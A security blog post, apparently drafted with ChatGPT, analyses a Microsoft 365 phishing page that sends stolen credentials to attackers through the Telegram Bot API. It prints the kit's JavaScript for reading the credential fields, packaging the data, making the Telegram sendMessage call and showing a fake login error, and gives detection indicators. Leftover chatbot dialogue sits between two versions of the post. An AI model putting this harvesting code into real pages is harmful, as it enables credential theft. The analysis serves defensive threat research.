Inside a Telegram-Powered Phishing Kit

By Pritam_Rakshit_ on February 7, 2026 (Last modified: March 16, 2026)

Threat Brief

Behind the Curtain: How a Phishing Page Steals Credentials Using Telegram

A technical teardown of a real-world credential harvesting kit abusing cloud messaging APIs

This blog analyzes a malicious HTML phishing page designed to impersonate a Microsoft 365 login portal. Unlike traditional phishing infrastructure, this kit does not rely on a backend server or database. Instead, it exfiltrates credentials in real time using the Telegram Bot API.

Credential Harvesting Telegram C2 High Severity

Where Are the Credentials Collected?

User credentials are captured directly from the browser DOM when the victim clicks the login button. No validation is performed against a legitimate service.

var x = $("#email").val(); // Email address var y = $("#password").val(); // Password var z = $("#tex").val(); // Phone / alternate email

How the Data Is Packaged

The phishing kit builds a structured message containing credentials along with environment metadata such as browser details, IP address, URL, and port.

let mff = " " + x + "\n\n psw: " + y + "\n\n num: " + z + "\n\n brw: " + browserVersion + "\n\n 1p: " + clientIp + "\n\n pot: " + port + "\n\n dir: " + dir;

Telegram as the Exfiltration Channel

Instead of sending data to an attacker-controlled server, the kit abuses Telegram’s Bot API to deliver stolen credentials instantly to the attacker’s chat.

fetch("https://api.telegram.org/bot<BOT_TOKEN>/sendMessage", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id: "<CHAT_ID>", text: mff }) });

This technique provides anonymity, encryption, and resilience, making takedown and attribution significantly harder.

Why Victims See a Login Error

After credentials are successfully exfiltrated, the page intentionally displays a fake authentication error. This social engineering trick encourages victims to retry, often yielding multiple password submissions.

$("#error").show(); $("input:password").val("");

Indicators of Compromise (IOCs)

Type Indicator Description
Network api.telegram.org/bot*/sendMessage Credential exfiltration endpoint
JavaScript BOT_TOKEN, chat_id Hardcoded Telegram bot identifiers
Behavior POST request after login click Immediate data exfiltration

Detection & Mitigation

  • Block outbound access to api.telegram.org where not business-critical
  • Alert on browser-based POST requests to Telegram Bot API
  • Educate users on phishing pages impersonating Microsoft services
  • Deploy EDR rules for JavaScript credential harvesting patterns

Final Thoughts

This phishing kit demonstrates how attackers increasingly rely on trusted cloud platforms for command-and-control and data exfiltration. Telegram-based C2 removes the need for traditional infrastructure and significantly lowers the barrier to entry for cybercrime.

Security Research Blog | Phishing & Threat Intelligence Analysis

If you want, I can also: Add MITRE ATT&CK mapping directly into the blog Convert this into a Markdown version Brand it as a SOC / DFIR / Threat Intel report page You said: basic HTML with basic inline css ChatGPT said: Here is a very basic HTML blog with simple inline CSS only (no external styles, no JS, no fancy layout). This is suitable for internal wiki, mail preview, or quick hosting. How a Phishing Page Steals Credentials Using Telegram Behind the Curtain: Telegram-Powered Phishing

A simple breakdown of a real-world credential harvesting HTML page

Overview

This blog explains how a malicious HTML page impersonates a Microsoft 365 login screen and steals user credentials. Instead of storing data on a server, the page sends stolen credentials directly to the attacker using the Telegram Bot API.

Credential Collection

When the victim clicks the login button, the page reads the email and password directly from the browser input fields.

var email = $("#email").val(); var password = $("#password").val();

Data Packaging

The stolen credentials are combined with additional information such as IP address, browser details, and page URL.

Email: user@example.com Password: ******** IP: Victim Public IP Browser: User-Agent

Telegram Exfiltration

Instead of sending data to a backend server, the phishing page sends the information directly to Telegram using a hardcoded bot token and chat ID.

POST https://api.telegram.org/bot<TOKEN>/sendMessage

Fake Login Failure

After credentials are successfully sent to the attacker, the page displays a fake error message. This tricks the victim into retrying and submitting their password multiple times.

Indicators of Compromise

  • Outbound POST requests to api.telegram.org
  • JavaScript variables named BOT_TOKEN or chat_id
  • Credential entry on non-Microsoft domains

Conclusion

This phishing technique shows how attackers abuse trusted cloud services like Telegram to avoid detection and infrastructure takedown. Blocking Telegram API access and monitoring browser-based POST requests can significantly reduce risk.

Security Analysis Blog | Credential Phishing Research